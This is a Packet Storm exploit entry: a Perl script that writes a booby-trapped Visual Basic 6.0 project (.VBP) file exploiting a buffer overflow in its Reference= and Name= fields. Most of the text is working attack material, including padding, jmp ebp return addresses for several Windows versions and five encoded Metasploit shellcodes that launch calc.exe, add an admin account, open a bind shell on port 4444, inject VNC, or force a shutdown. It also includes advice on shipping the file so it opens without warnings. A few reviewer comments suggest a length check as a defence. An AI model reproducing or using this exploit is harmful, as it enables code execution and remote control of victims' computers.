ID PACKETSTORM:59048
Type packetstorm
Reporter koshi
Modified 2007-09-05T00:00:00
Description
`#!/usr/bin/perl
#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'++ Author: Koshi +
#'++ Email: heykoshi at gmail dot com +
#'++ Application: Microsoft Visual Basic 6.0 +
#'++ +
#'++ Tested on Microsoft Windows XP Home Edition SP2 +
#'++ Patched & Updated +
#'++ +
#'++ The vulnerable buffer exists in the .VBP files of +
#'++ Visual Basic projects. You can jump directly to +
#'++ the shellcode, or jump to it via EBP. +
#'++ +
#'++ There is NO restriction of shellcode size either. +
#'++ +
#'++ Gr33tz: Rima my baby who I love and adore, Draven +
#'++ for pointing me in the right direction, as always. +
#'++ +
#'++ +
#'++ This exploit is for educational use only, blah. +
#'++ +
#'++ +
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# Ex. of Usage:
# perl vb6.pl 1 >>Project.vbp
#
#
# First three fragments of the generated .VBP, written as the plain text
# they encode (the original spelled them as \x.. escapes). $begin0 and
# $begin2 carry CRLF line endings; $begin1 is the Reference= line, which
# deliberately has no terminating CRLF because the padding that follows
# is appended straight onto its value.
$begin0 = "Type=Exe\r\nForm=Form1.frm\r\n";
$begin1 = 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#'
        . '..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation';
$begin2 = "\r\nStartup=\"Form1\"\r\nCommand32=\"\"";
# Padding appended straight onto the Reference= value with no line break,
# so that field runs long enough to reach the four-byte values written
# after it. The exact length was fixed by the author and is not checked
# anywhere in this script. Reviewer note: presumably no IDE-written .VBP
# carries a Reference= value anywhere near this length, so a per-line
# length limit in anything that parses .VBP files is a cheap sanity
# check against this kind of input — TODO confirm against a clean .VBP.
$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41";
$codeAddr = "\x83\x25\x40\x01";
# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example.
# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
# ...backwards..if you don't know why, then gtfo.
$jmpEbp = "\xA3\x3D\x92\x7C";
$fourSkin = "\x44\x44\x44\x44";
# Second field that is overrun: a CRLF, then `Name="Project1` plus filler.
# The print lines below place the selected payload directly after this
# string and only then add the closing quote ($endQuote), so the whole
# payload sits inside the Name= value. Reviewer note: as with Reference=,
# this value is far longer than any project name an IDE would write —
# TODO confirm against a clean .VBP.
$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63".
"\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41";
# Remainder of the .VBP after the closing quote of the Name= value, as
# plain text (the original spelled it as \x.. escapes). These are ordinary
# VB6 project settings followed by the [MS Transaction Server] section.
# The leading and trailing '' elements give the leading CRLF and the
# CRLF after the final line; the '' in the middle is the blank line
# before the section header.
$koshi = join "\r\n", '',
    'HelpContextID="0"',
    'CompatibleMode="0"',
    'MajorVer=1',
    'MinorVer=0',
    'RevisionVer=0',
    'AutoIncrementVer=0',
    'ServerSupportFiles=0',
    'CompilationType=0',
    'OptimizationType=0',
    'FavorPentiumPro(tm)=0',
    'CodeViewDebugInfo=0',
    'NoAliasing=0',
    'BoundsCheck=0',
    'OverflowCheck=0',
    'FlPointCheck=0',
    'FDIVCheck=0',
    'UnroundedFP=0',
    'StartMode=0',
    'Unattended=0',
    'Retained=0',
    'ThreadPerObject=0',
    'MaxNumberOfThreads=1',
    '',
    '[MS Transaction Server]',
    'AutoRefresh=1',
    '';
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47".
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a".
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56".
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a";
# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com
$shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58".
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58".
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53".
"\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59".
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
"\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46".
"\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36".
"\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32".
"\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34".
"\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46".
"\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56".
"\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56".
"\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57".
"\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36".
"\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
$shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37".
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58".
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d".
"\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48".
"\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46".
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46".
"\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37".
"\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54".
"\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31".
"\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a".
"\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31".
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46".
"\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42".
"\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46".
"\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
$shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
"\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
"\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
"\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
"\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
"\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
"\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
"\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
"\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
"\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
"\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
"\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
"\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
"\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
"\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
"\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
"\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
"\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
"\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
"\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
"\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
"\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
"\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
"\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
"\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
"\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
"\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
"\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
"\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
"\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
"\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
"\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
"\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
"\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
"\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
"\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
"\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
# win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com
$shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48".
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38".
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48".
"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b".
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
"\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39".
"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56".
"\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42".
"\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35".
"\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".
"\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".
"\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".
"\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".
"\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".
"\x42\x30\x5a";
# Closing quote for the Name="... value; it is written only after the
# payload has been appended.
$endQuote = '"';
# Option number from the command line. NOTE(review): the script has no
# `use strict`/`use warnings`, so $i and every other variable here are
# package globals, and a missing or non-numeric argument simply fails
# every comparison below and falls through to the usage banner.
$i = $ARGV[0];
# Everything before the payload and everything after it is identical for
# all five options; only the payload bytes differ. The numeric == of the
# original is kept on purpose, so an argument that merely numifies to
# one of 1..5 is accepted exactly as before.
my $vbp_prefix = $begin0 . $begin1 . $BuffOf . $codeAddr . $jmpEbp
               . $fourSkin . $begin2 . $begin3;
my @payload_for = (undef, $shellc1, $shellc2, $shellc3, $shellc4, $shellc5);
for my $option (1 .. 5) {
    next unless $i == $option;
    print $vbp_prefix . $payload_for[$option] . $endQuote . $koshi;
    exit;
}
# Usage banner, reached only when no option in 1..5 was selected. A
# non-interpolating here-doc holds the text exactly as it is printed; the
# blank first line is the leading newline the original printed on its own.
print <<'BANNER';

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 +++ +++
 +++ +++
 +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++
 +++ Written By Koshi +++
 +++ Greets: Rima my baby! Draven, thanks for helping. +++
 +++ +++
 +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++
 +++ +++
 +++ Options: +++
 +++ 1 - win32_exec CALC.EXE +++
 +++ 2 - win32_adduser Pass=4dmin User=koshi +++
 +++ 3 - win32_bind Port 4444 +++
 +++ 4 - win32_bind_vncinject Port 5900 +++
 +++ 5 - win32_exec shutdown -c "HAI VEn0m pw.. +++
 +++ +++
 +++ +++
 +++ Notes: Ship final .VBP file with a .FRM file to avoid +++
 +++ warnings in Visual Basic 6.0 +++
 +++ +++
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
BANNER
exit;
#EOF
`
